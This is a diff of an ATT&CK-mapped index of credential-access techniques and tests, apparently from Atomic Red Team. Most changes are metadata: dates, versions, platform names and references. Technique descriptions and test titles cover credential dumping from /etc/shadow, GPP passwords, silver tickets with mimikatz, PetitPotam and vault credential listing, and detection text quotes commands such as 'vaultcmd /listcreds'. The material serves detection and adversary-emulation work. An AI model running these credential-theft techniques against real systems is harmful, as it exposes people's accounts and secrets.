-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -95315,20 +96041,49 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests:
     - name: GPP Passwords (findstr)
@@ -95407,7 +96162,7 @@ credential-access:
         name: powershell
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -95482,11 +96237,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -95530,11 +96284,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -95558,8 +96311,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -95575,11 +96328,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -95590,11 +96342,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -95604,16 +96358,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -95651,13 +96405,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -95666,6 +96417,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -95673,11 +96425,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -95695,13 +96447,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -95714,6 +96463,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -95727,12 +96477,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -95764,17 +96515,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -95847,7 +96595,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests:
     - name: AppleScript - Prompt User for Password
@@ -95896,7 +96643,7 @@ credential-access:
         name: bash
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -95905,6 +96652,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -95923,18 +96671,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -95958,13 +96706,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -95990,6 +96735,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -96001,18 +96747,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -96031,9 +96777,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests:
     - name: SSH Credential Stuffing From Linux
@@ -96178,7 +96921,7 @@ credential-access:
           \     \n"
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -96207,24 +96950,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -96259,13 +97004,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -96343,9 +97085,8 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests:
     - name: PetitPotam
@@ -96427,7 +97168,7 @@ credential-access:
         elevation_required: false
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -96443,6 +97184,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -96451,13 +97193,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -96465,15 +97207,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -96484,9 +97222,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -96532,7 +97269,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -96551,17 +97288,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -96594,10 +97330,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -96634,11 +97369,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -96706,34 +97440,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -96742,20 +97452,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests:
     - name: Access /etc/shadow (Local)
@@ -96889,7 +97621,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -96915,8 +97647,6 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests:
     - name: Crafting Active Directory silver tickets with mimikatz
@@ -97002,7 +97732,7 @@ credential-access:
           -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n"
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -97019,24 +97749,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -97077,9 +97807,8 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests:
     - name: Access Saved Credentials via VaultCmd
@@ -97110,29 +97839,7 @@ credential-access:
         name: powershell
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
